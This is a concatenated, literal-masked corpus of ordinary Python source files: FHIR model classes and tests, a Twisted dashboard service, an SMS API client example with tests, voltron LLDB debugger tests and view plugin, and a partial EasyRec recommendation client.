<NUM_LIT:1> ] . amount . numerator . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:1> ] . amount . numerator . value , <NUM_LIT> ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication7 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication7 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication7 ( inst2 ) <EOL> def implMedication7 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . 
coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertFalse ( inst . isBrand ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication8 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication8 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication8 ( inst2 ) <EOL> def implMedication8 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertFalse ( inst . isBrand ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) </s>
<s> import os <EOL> import io <EOL> import unittest <EOL> import json <EOL> from . import parameters <EOL> from . fhirdate import FHIRDate <EOL> class ParametersTests ( unittest . TestCase ) : <EOL> def instantiate_from ( self , filename ) : <EOL> datadir = os . environ . get ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> with io . open ( os . path . join ( datadir , filename ) , '<STR_LIT:r>' , encoding = '<STR_LIT:utf-8>' ) as handle : <EOL> js = json . load ( handle ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> return parameters . Parameters ( js ) <EOL> def testParameters1 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implParameters1 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = parameters . Parameters ( js ) <EOL> self . implParameters1 ( inst2 ) <EOL> def implParameters1 ( self , inst ) : <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . parameter [ <NUM_LIT:0> ] . name , "<STR_LIT:start>" ) <EOL> self . assertEqual ( inst . parameter [ <NUM_LIT:0> ] . valueDate . date , FHIRDate ( "<STR_LIT>" ) . date ) <EOL> self . assertEqual ( inst . parameter [ <NUM_LIT:0> ] . valueDate . as_json ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . parameter [ <NUM_LIT:1> ] . name , "<STR_LIT:end>" ) </s>
<s> from . import element <EOL> class Range ( element . Element ) : <EOL> """<STR_LIT>""" <EOL> resource_name = "<STR_LIT>" <EOL> def __init__ ( self , jsondict = None ) : <EOL> """<STR_LIT>""" <EOL> self . high = None <EOL> """<STR_LIT>""" <EOL> self . low = None <EOL> """<STR_LIT>""" <EOL> super ( Range , self ) . __init__ ( jsondict ) <EOL> def elementProperties ( self ) : <EOL> js = super ( Range , self ) . elementProperties ( ) <EOL> js . extend ( [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , quantity . Quantity , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , quantity . Quantity , False , None , False ) , <EOL> ] ) <EOL> return js <EOL> from . import quantity </s>
<s> from . import domainresource <EOL> class SupplyRequest ( domainresource . DomainResource ) : <EOL> """<STR_LIT>""" <EOL> resource_name = "<STR_LIT>" <EOL> def __init__ ( self , jsondict = None ) : <EOL> """<STR_LIT>""" <EOL> self . date = None <EOL> """<STR_LIT>""" <EOL> self . identifier = None <EOL> """<STR_LIT>""" <EOL> self . kind = None <EOL> """<STR_LIT>""" <EOL> self . orderedItem = None <EOL> """<STR_LIT>""" <EOL> self . patient = None <EOL> """<STR_LIT>""" <EOL> self . reasonCodeableConcept = None <EOL> """<STR_LIT>""" <EOL> self . reasonReference = None <EOL> """<STR_LIT>""" <EOL> self . source = None <EOL> """<STR_LIT>""" <EOL> self . status = None <EOL> """<STR_LIT>""" <EOL> self . supplier = None <EOL> """<STR_LIT>""" <EOL> self . when = None <EOL> """<STR_LIT>""" <EOL> super ( SupplyRequest , self ) . __init__ ( jsondict ) <EOL> def elementProperties ( self ) : <EOL> js = super ( SupplyRequest , self ) . elementProperties ( ) <EOL> js . extend ( [ <EOL> ( "<STR_LIT:date>" , "<STR_LIT:date>" , fhirdate . FHIRDate , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , identifier . Identifier , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , codeableconcept . CodeableConcept , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , fhirreference . FHIRReference , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , fhirreference . FHIRReference , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , codeableconcept . CodeableConcept , False , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , fhirreference . FHIRReference , False , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT:source>" , "<STR_LIT:source>" , fhirreference . FHIRReference , False , None , False ) , <EOL> ( "<STR_LIT:status>" , "<STR_LIT:status>" , str , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , fhirreference . 
FHIRReference , True , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , SupplyRequestWhen , False , None , False ) , <EOL> ] ) <EOL> return js <EOL> from . import backboneelement <EOL> class SupplyRequestWhen ( backboneelement . BackboneElement ) : <EOL> """<STR_LIT>""" <EOL> resource_name = "<STR_LIT>" <EOL> def __init__ ( self , jsondict = None ) : <EOL> """<STR_LIT>""" <EOL> self . code = None <EOL> """<STR_LIT>""" <EOL> self . schedule = None <EOL> """<STR_LIT>""" <EOL> super ( SupplyRequestWhen , self ) . __init__ ( jsondict ) <EOL> def elementProperties ( self ) : <EOL> js = super ( SupplyRequestWhen , self ) . elementProperties ( ) <EOL> js . extend ( [ <EOL> ( "<STR_LIT:code>" , "<STR_LIT:code>" , codeableconcept . CodeableConcept , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , timing . Timing , False , None , False ) , <EOL> ] ) <EOL> return js <EOL> from . import codeableconcept <EOL> from . import fhirdate <EOL> from . import fhirreference <EOL> from . import identifier <EOL> from . import timing </s>
<s> from os . path import join <EOL> from twisted . application . internet import TCPServer <EOL> from twisted . python . log import NullFile <EOL> from twisted . python . util import sibpath <EOL> from twisted . web import server , static <EOL> from smartanthill . dashboard . api import REST <EOL> from smartanthill . log import Logger <EOL> from smartanthill . service import SAMultiService <EOL> class DashboardSite ( server . Site ) : <EOL> def _openLogFile ( self , path ) : <EOL> log = Logger ( "<STR_LIT>" ) <EOL> def wrapper ( msg ) : <EOL> log . debug ( msg . strip ( ) ) <EOL> nf = NullFile ( ) <EOL> nf . write = wrapper <EOL> return nf <EOL> class DashboardService ( SAMultiService ) : <EOL> def __init__ ( self , name , options ) : <EOL> SAMultiService . __init__ ( self , name , options ) <EOL> def startService ( self ) : <EOL> root = static . File ( sibpath ( __file__ , join ( "<STR_LIT>" , "<STR_LIT>" ) ) ) <EOL> root . putChild ( "<STR_LIT>" , REST ( ) ) <EOL> TCPServer ( <EOL> self . options [ '<STR_LIT:port>' ] , <EOL> DashboardSite ( root , logPath = "<STR_LIT>" ) ) . setServiceParent ( self ) <EOL> SAMultiService . startService ( self ) <EOL> def makeService ( name , options ) : <EOL> return DashboardService ( name , options ) </s>
<s> from twisted . python . log import addObserver , removeObserver <EOL> from twisted . trial . unittest import TestCase <EOL> from smartanthill . log import Level , Logger <EOL> class LogCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> addObserver ( self . _logobserver ) <EOL> self . log = Logger ( "<STR_LIT:test>" ) <EOL> self . _lastlog = None <EOL> def tearDown ( self ) : <EOL> removeObserver ( self . _logobserver ) <EOL> def _logobserver ( self , data ) : <EOL> self . _lastlog = data <EOL> def test_emit ( self ) : <EOL> self . log . set_level ( Level . DEBUG ) <EOL> for l in Level . iterconstants ( ) : <EOL> _lname = l . name . lower ( ) <EOL> try : <EOL> getattr ( self . log , _lname ) ( "<STR_LIT>" , _satraceback = False ) <EOL> except SystemExit : <EOL> self . assertEqual ( l , Level . FATAL ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , "<STR_LIT:test>" if l == Level . INFO <EOL> else "<STR_LIT>" + _lname ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , l ) <EOL> def test_level ( self ) : <EOL> self . log . set_level ( Level . INFO ) <EOL> self . _lastlog = None <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> self . assertEqual ( self . _lastlog , None ) <EOL> self . log . info ( "<STR_LIT>" , some_param = <NUM_LIT> ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , Level . INFO ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT:message>' ] , ( '<STR_LIT>' , ) ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> self . log . warn ( "<STR_LIT>" ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , Level . WARN ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT:message>' ] , ( '<STR_LIT>' , ) ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> self . log . error ( "<STR_LIT>" ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , Level . 
ERROR ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , <NUM_LIT:1> ) </s>
<s> from chatto_transform . datastores . appendable_datastore import AppendableHdfDataStore <EOL> from chatto_transform . schema . mimic . mimic_schema import chartevents_schema <EOL> from chatto_transform . config import mimic_config <EOL> from pandas . io . pytables import Term <EOL> import pandas as pd <EOL> import os . path <EOL> EXPECTED_ROWS = <NUM_LIT> <EOL> class CharteventsDataStore ( AppendableHdfDataStore ) : <EOL> def __init__ ( self ) : <EOL> super ( ) . __init__ ( chartevents_schema , mimic_config . local_storage_dir + '<STR_LIT>' , expected_rows = EXPECTED_ROWS ) <EOL> def _get_data_columns ( self ) : <EOL> return chartevents_schema . col_names ( ) <EOL> def select ( self , where ) : <EOL> store = self . _get_store ( ) <EOL> df = store . select ( '<STR_LIT>' , where = where , autoclose = True ) <EOL> for col in self . _categorical_cols ( ) : <EOL> if self . _any_categories ( col ) : <EOL> print ( '<STR_LIT>' , col ) <EOL> categories = self . _load_categories ( col ) <EOL> else : <EOL> categories = [ ] <EOL> df [ col ] = pd . Categorical . from_codes ( df [ col ] , categories = categories , name = col ) <EOL> df = self . _rename_df_from_hdf ( df ) <EOL> return df </s>
<s> __author__ = '<STR_LIT>' <EOL> import threading <EOL> import time <EOL> class debug ( object ) : <EOL> @ staticmethod <EOL> def no_return ( originalFunction , * args , ** kwargs ) : <EOL> def callNoReturn ( * args , ** kwargs ) : <EOL> originalFunction ( * args , ** kwargs ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> return callNoReturn <EOL> MINUTE = <NUM_LIT> <EOL> HOUR = <NUM_LIT> * MINUTE <EOL> INFINITE = <NUM_LIT:0> <EOL> class cached_property ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ttl = <NUM_LIT> ) : <EOL> self . ttl = ttl <EOL> def __call__ ( self , fget , doc = None ) : <EOL> self . fget = fget <EOL> self . __doc__ = doc or fget . __doc__ <EOL> self . __name__ = fget . __name__ <EOL> self . __module__ = fget . __module__ <EOL> return self <EOL> def __get__ ( self , inst , owner ) : <EOL> now = time . time ( ) <EOL> try : <EOL> value , last_update = inst . _cache [ self . __name__ ] <EOL> if now - last_update > self . ttl > <NUM_LIT:0> : <EOL> raise AttributeError <EOL> except ( KeyError , AttributeError ) : <EOL> value = self . fget ( inst ) <EOL> try : <EOL> cache = inst . _cache <EOL> except AttributeError : <EOL> cache = inst . _cache = { } <EOL> cache [ self . __name__ ] = ( value , now ) <EOL> return value <EOL> class Singleton : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , decorated ) : <EOL> self . _lock = threading . Lock ( ) <EOL> self . _decorated = decorated <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> with self . _lock : <EOL> try : <EOL> return self . _instance <EOL> except AttributeError : <EOL> self . _instance = self . _decorated ( * args , ** kwargs ) <EOL> return self . _instance <EOL> def __instancecheck__ ( self , inst ) : <EOL> return isinstance ( inst , self . _decorated ) </s>
# Example script: send a single SMS through the SMSAPI client and print
# the per-message results.
from smsapi.client import SmsAPI

api = SmsAPI()
api.set_username('<STR_LIT>')
api.set_password('<STR_LIT>')
# Select which service/action to perform (values masked in this corpus).
api.service('<STR_LIT>').action('<STR_LIT>')
api.set_content('<STR_LIT>')
api.set_to('<STR_LIT>')
result = api.execute()
# Each result element describes one queued message.
for r in result:
    print(r.id, r.points, r.status)
import time
import unittest
from tests import SmsApiTestCase, PHONE_NUMBER, SEND_DELAY
from smsapi.responses import ApiResponse


class ServiceSmsTestCase(SmsApiTestCase):
    """Integration tests for the SMS service: send, get and delete actions."""

    def setUp(self):
        super(ServiceSmsTestCase, self).setUp()
        self.api.service('<STR_LIT>')
        # Schedule the message SEND_DELAY seconds in the future so tests can
        # delete it before it is actually dispatched.
        self.message_params = {
            '<STR_LIT:content>': '<STR_LIT>',
            '<STR_LIT:to>': PHONE_NUMBER,
            '<STR_LIT:date>': time.time() + SEND_DELAY
        }
        # Set by tests that leave a pending message; tearDown cleans it up.
        self.message_id = None

    def test_send(self):
        self.api.action('<STR_LIT>', self.message_params)
        response = self.api.execute()
        self.message_id = response.id
        self.assertIsInstance(response, ApiResponse)
        self.assertIsNotNone(response.id)

    def test_delete(self):
        # Send, then delete by id; the delete response echoes the same id,
        # so no tearDown cleanup is needed here.
        self.api.action('<STR_LIT>', self.message_params)
        send_response = self.api.execute()
        self.api.action('<STR_LIT>', {'<STR_LIT:id>': send_response.id})
        delete_response = self.api.execute()
        self.assertEqual(send_response.id, delete_response.id)
        self.assertIsInstance(delete_response, ApiResponse)

    def test_get(self):
        # Send, then fetch the scheduled message by id.
        self.api.action('<STR_LIT>', self.message_params)
        send_response = self.api.execute()
        self.message_id = send_response.id
        self.api.action('<STR_LIT>', {'<STR_LIT:id>': send_response.id})
        get_response = self.api.execute()
        self.assertEqual(send_response.id, get_response.id)
        self.assertIsInstance(get_response, ApiResponse)

    def tearDown(self):
        # Best-effort removal of any message left pending by a test.
        if self.message_id:
            self.api.action('<STR_LIT>', {'<STR_LIT:id>': self.message_id})
            self.api.execute()


def suite():
    """Build a TestSuite containing the service SMS tests."""
    suite = unittest.TestSuite()
    suite.addTest(unittest.makeSuite(ServiceSmsTestCase))
    return suite
"""Nose tests for the voltron LLDB debugger adaptor.

The entire module body is wrapped in a try/except so that environments
without the `lldb` Python bindings simply skip these tests instead of
failing at import time.
"""
import tempfile
import sys
import json
import time
import logging
import subprocess
import threading
from mock import Mock
from nose.tools import *
import voltron
from voltron.core import *
from voltron.api import *
from voltron.plugin import PluginManager, DebuggerAdaptorPlugin
import platform
if platform.system() == '<STR_LIT>':
    # Make the system lldb Python bindings importable (path masked).
    sys.path.append("<STR_LIT>")
try:
    import lldb
    # NOTE(review): `os` (used below via os.getcwd) appears to come in via
    # this star import — confirm against the `common` test helper module.
    from common import *
    voltron.setup_env()
    log = logging.getLogger('<STR_LIT>')

    def setup():
        # Build the test target once and set a breakpoint so launched
        # processes stop immediately (leaving them in a known state).
        global adaptor, dbg, target
        log.info("<STR_LIT>")
        pm = PluginManager()
        plugin = pm.debugger_plugin_for_host('<STR_LIT>')
        adaptor = plugin.adaptor_class()
        subprocess.call("<STR_LIT>", shell=True)
        target = adaptor.host.CreateTargetWithFileAndArch("<STR_LIT>", lldb.LLDB_ARCH_DEFAULT)
        main_bp = target.BreakpointCreateByName("<STR_LIT>", target.GetExecutable().GetFilename())

    def teardown():
        # Give lldb a moment to release the target between test modules.
        time.sleep(<NUM_LIT:2>)

    def test_version():
        assert '<STR_LIT>' in adaptor.version()

    def test_state_invalid():
        # state() with no running process must raise NoSuchTargetException;
        # any other exception (or none) fails the test.
        try:
            adaptor.state()
            exception = False
        except NoSuchTargetException:
            exception = True
        except:
            exception = False
        assert exception

    def test_targets_not_running():
        t = adaptor.targets()[<NUM_LIT:0>]
        assert t["<STR_LIT:state>"] == "<STR_LIT>"
        assert t["<STR_LIT>"] == "<STR_LIT>"
        assert t["<STR_LIT:id>"] == <NUM_LIT:0>
        assert len(t["<STR_LIT:file>"]) > <NUM_LIT:0>
        assert '<STR_LIT>' in t["<STR_LIT:file>"]

    def test_targets_stopped():
        # Launch stops at the breakpoint set in setup(), so the target
        # should report a stopped state.
        process = target.LaunchSimple(None, None, os.getcwd())
        t = adaptor.targets()[<NUM_LIT:0>]
        assert t["<STR_LIT:state>"] == "<STR_LIT>"
        process.Destroy()

    def test_registers():
        process = target.LaunchSimple(None, None, os.getcwd())
        regs = adaptor.registers()
        assert regs is not None
        assert len(regs) > <NUM_LIT:0>
        assert regs['<STR_LIT>'] != <NUM_LIT:0>
        process.Destroy()

    def test_stack_pointer():
        process = target.LaunchSimple(None, None, os.getcwd())
        sp = adaptor.stack_pointer()
        assert sp != <NUM_LIT:0>
        process.Destroy()

    def test_program_counter():
        process = target.LaunchSimple(None, None, os.getcwd())
        pc_name, pc = adaptor.program_counter()
        assert pc != <NUM_LIT:0>
        process.Destroy()

    def test_memory():
        # Read a fixed-length chunk at a register-addressed location.
        process = target.LaunchSimple(None, None, os.getcwd())
        regs = adaptor.registers()
        mem = adaptor.memory(address=regs['<STR_LIT>'], length=<NUM_LIT>)
        assert len(mem) == <NUM_LIT>
        process.Destroy()

    def test_stack():
        process = target.LaunchSimple(None, None, os.getcwd())
        stack = adaptor.stack(length=<NUM_LIT>)
        assert len(stack) == <NUM_LIT>
        process.Destroy()

    def test_disassemble():
        process = target.LaunchSimple(None, None, os.getcwd())
        output = adaptor.disassemble(count=<NUM_LIT>)
        assert len(output) > <NUM_LIT:0>
        process.Destroy()

    def test_command():
        # Run a raw debugger command and sanity-check its output.
        process = target.LaunchSimple(None, None, os.getcwd())
        output = adaptor.command("<STR_LIT>")
        assert len(output) > <NUM_LIT:0>
        assert '<STR_LIT>' in output
        process.Destroy()

    def test_dereference_main():
        process = target.LaunchSimple(None, None, os.getcwd())
        regs = adaptor.registers()
        output = adaptor.dereference(regs['<STR_LIT>'])
        assert ('<STR_LIT>', '<STR_LIT>') in output
        process.Destroy()

    def test_dereference_rsp():
        process = target.LaunchSimple(None, None, os.getcwd())
        regs = adaptor.registers()
        output = adaptor.dereference(regs['<STR_LIT>'])
        assert ('<STR_LIT>', '<STR_LIT>') in output
        process.Destroy()

    def test_dereference_string():
        # Dereference chain should end in a string value.
        process = target.LaunchSimple(None, None, os.getcwd())
        regs = adaptor.registers()
        output = adaptor.dereference(regs['<STR_LIT>'] + <NUM_LIT>)
        assert '<STR_LIT>' in list(output[-<NUM_LIT:1>])[-<NUM_LIT:1>]
        process.Destroy()

    def test_breakpoints():
        # Exactly one breakpoint (set in setup()) should be reported.
        process = target.LaunchSimple(None, None, os.getcwd())
        bps = adaptor.breakpoints()
        assert len(bps) == <NUM_LIT:1>
        assert bps[<NUM_LIT:0>]['<STR_LIT>'] == False
        assert bps[<NUM_LIT:0>]['<STR_LIT>']
        assert bps[<NUM_LIT:0>]['<STR_LIT:id>'] == <NUM_LIT:1>
        assert bps[<NUM_LIT:0>]['<STR_LIT>'] > <NUM_LIT:0>
        assert bps[<NUM_LIT:0>]['<STR_LIT>'][<NUM_LIT:0>]['<STR_LIT:name>'] == "<STR_LIT>"
        process.Destroy()

    def test_capabilities():
        assert adaptor.capabilities() == ['<STR_LIT>']
# NOTE(review): bare except deliberately(?) swallows *any* import/setup
# failure, not just a missing lldb — consider `except ImportError`.
except:
    print("<STR_LIT>")
import logging

from voltron.view import *
from voltron.plugin import *
from voltron.api import *

log = logging.getLogger('<STR_LIT>')


class BacktraceView(TerminalView):
    """Terminal view that displays the debugger's backtrace."""

    def render(self):
        """Fetch the backtrace from the debugger host and render it.

        On timeout or missing response the view is left untouched; on an
        error response the (coloured) error message becomes the body.
        """
        height, width = self.window_size()
        self.title = '<STR_LIT>'
        res = self.client.perform_request('<STR_LIT>', block=self.block, command='<STR_LIT>')
        # Fix: check for a missing response before touching its attributes.
        # Previously `res.timed_out` was evaluated first, raising
        # AttributeError whenever perform_request returned None.
        if res is None or res.timed_out:
            return
        if res and res.is_success:
            self.body = res.output
        else:
            log.error("<STR_LIT>".format(res.message))
            self.body = self.colour(res.message, '<STR_LIT>')
        super(BacktraceView, self).render()


class BacktraceViewPlugin(ViewPlugin):
    # Registration metadata consumed by voltron's plugin manager.
    plugin_type = '<STR_LIT>'
    name = '<STR_LIT>'
    aliases = ('<STR_LIT:t>', '<STR_LIT>', '<STR_LIT>')
    view_class = BacktraceView
<s> import requests <EOL> from django . db . models import get_model <EOL> from . errors import EasyRecException <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> TIME_RANGE_DAY = '<STR_LIT>' <EOL> TIME_RANGE_WEEK = '<STR_LIT>' <EOL> TIME_RANGE_MONTH = '<STR_LIT>' <EOL> TIME_RANGE_ALL = '<STR_LIT>' <EOL> TIME_RANGES = ( <EOL> TIME_RANGE_DAY , <EOL> TIME_RANGE_WEEK , <EOL> TIME_RANGE_MONTH , <EOL> TIME_RANGE_ALL <EOL> ) <EOL> class EasyRec ( object ) : <EOL> _base_url = "<STR_LIT>" <EOL> _default_item_type = '<STR_LIT>' <EOL> _default_time_range = TIME_RANGE_ALL <EOL> def __init__ ( self , endpoint , tenant , api_key ) : <EOL> if not endpoint . startswith ( '<STR_LIT:http>' ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> if endpoint . endswith ( "<STR_LIT:/>" ) : <EOL> endpoint = endpoint [ : - <NUM_LIT:1> ] <EOL> self . _endpoint = "<STR_LIT:/>" . join ( ( endpoint , self . _base_url ) ) <EOL> self . _tenant = tenant <EOL> self . _api_key = api_key <EOL> self . _requests = requests <EOL> def add_view ( self , session_id , item_id , item_desc , item_url , <EOL> item_type = '<STR_LIT>' , user_id = None , image_url = None , <EOL> action_time = None ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> '<STR_LIT>' : session_id , <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : item_desc , <EOL> '<STR_LIT>' : item_url , <EOL> '<STR_LIT>' : self . _get_item_type ( item_type ) <EOL> } <EOL> if user_id : <EOL> options [ '<STR_LIT>' ] = user_id <EOL> if image_url : <EOL> options [ '<STR_LIT>' ] = image_url <EOL> if action_time : <EOL> options [ '<STR_LIT>' ] = action_time . strftime ( "<STR_LIT>" ) <EOL> url = self . _build_url ( '<STR_LIT>' ) <EOL> return self . 
_fetch_response ( url , params = options ) <EOL> def add_buy ( self , session_id , item_id , item_desc , item_url , <EOL> item_type = '<STR_LIT>' , user_id = None , image_url = None , <EOL> action_time = None ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> '<STR_LIT>' : session_id , <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : item_desc , <EOL> '<STR_LIT>' : item_url , <EOL> '<STR_LIT>' : self . _get_item_type ( item_type ) <EOL> } <EOL> if user_id : <EOL> options [ '<STR_LIT>' ] = user_id <EOL> if image_url : <EOL> options [ '<STR_LIT>' ] = image_url <EOL> if action_time : <EOL> options [ '<STR_LIT>' ] = action_time . strftime ( "<STR_LIT>" ) <EOL> url = self . _build_url ( '<STR_LIT>' ) <EOL> return self . _fetch_response ( url , params = options ) <EOL> def add_rating ( self , session_id , item_id , item_desc , item_url , rating , <EOL> item_type = '<STR_LIT>' , user_id = None , image_url = None , <EOL> action_time = None ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> '<STR_LIT>' : session_id , <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : item_desc , <EOL> '<STR_LIT>' : item_url , <EOL> '<STR_LIT>' : self . _get_item_type ( item_type ) , <EOL> '<STR_LIT>' : rating , <EOL> } <EOL> if user_id : <EOL> options [ '<STR_LIT>' ] = user_id <EOL> if image_url : <EOL> options [ '<STR_LIT>' ] = image_url <EOL> if action_time : <EOL> options [ '<STR_LIT>' ] = action_time . strftime ( "<STR_LIT>" ) <EOL> url = self . _build_url ( '<STR_LIT>' ) <EOL> return self . _fetch_response ( url , params = options ) <EOL> def add_action ( self , session_id , item_id , item_desc , item_url , action , <EOL> value = None , item_type = '<STR_LIT>' , user_id = None , image_url = None , <EOL> action_time = None ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . 
_tenant , <EOL> '<STR_LIT>' : session_id , <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : item_desc , <EOL> '<STR_LIT>' : item_url , <EOL> '<STR_LIT>' : self . _get_item_type ( item_type ) , <EOL> '<STR_LIT>' : action , <EOL> } <EOL> if value : <EOL> options [ '<STR_LIT>' ] = value <EOL> if user_id : <EOL> options [ '<STR_LIT>' ] = user_id <EOL> if image_url : <EOL> options [ '<STR_LIT>' ] = image_url <EOL> if action_time : <EOL> options [ '<STR_LIT>' ] = action_time . strftime ( "<STR_LIT>" ) <EOL> url = self . _build_url ( '<STR_LIT>' ) <EOL> return self . _fetch_response ( url , params = options ) <EOL> def get_user_recommendations ( self , user_id , max_results = None , <EOL> requested_item_type = None , action_type = None ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> '<STR_LIT>' : user_id <EOL> } <EOL> if max_results : <EOL> options [ '<STR_LIT>' ] = max_results <EOL> if requested_item_type : <EOL> options [ '<STR_LIT>' ] = self . _get_item_type ( requested_item_type ) <EOL> if action_type : <EOL> options [ '<STR_LIT>' ] = action_type <EOL> url = self . _build_url ( '<STR_LIT>' ) <EOL> recommendations = self . _fetch_response ( url , params = options ) <EOL> return self . _recommendations_to_products ( recommendations ) <EOL> def get_other_users_also_bought ( self , item_id , user_id = None , <EOL> max_results = None , item_type = None , requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : user_id , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : item_type , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . 
_get_item_based_recommendation ( '<STR_LIT>' , <EOL> ** kwargs ) <EOL> def get_other_users_also_viewed ( self , item_id , user_id = None , <EOL> max_results = None , item_type = None , requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : user_id , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : item_type , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_item_based_recommendation ( '<STR_LIT>' , <EOL> ** kwargs ) <EOL> def get_items_rated_as_good_by_other_users ( self , item_id , user_id = None , <EOL> max_results = None , item_type = None , requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : user_id , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : item_type , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_item_based_recommendation ( '<STR_LIT>' , <EOL> ** kwargs ) <EOL> def get_related_items ( self , item_id , max_results = None , assoc_type = None , <EOL> requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : 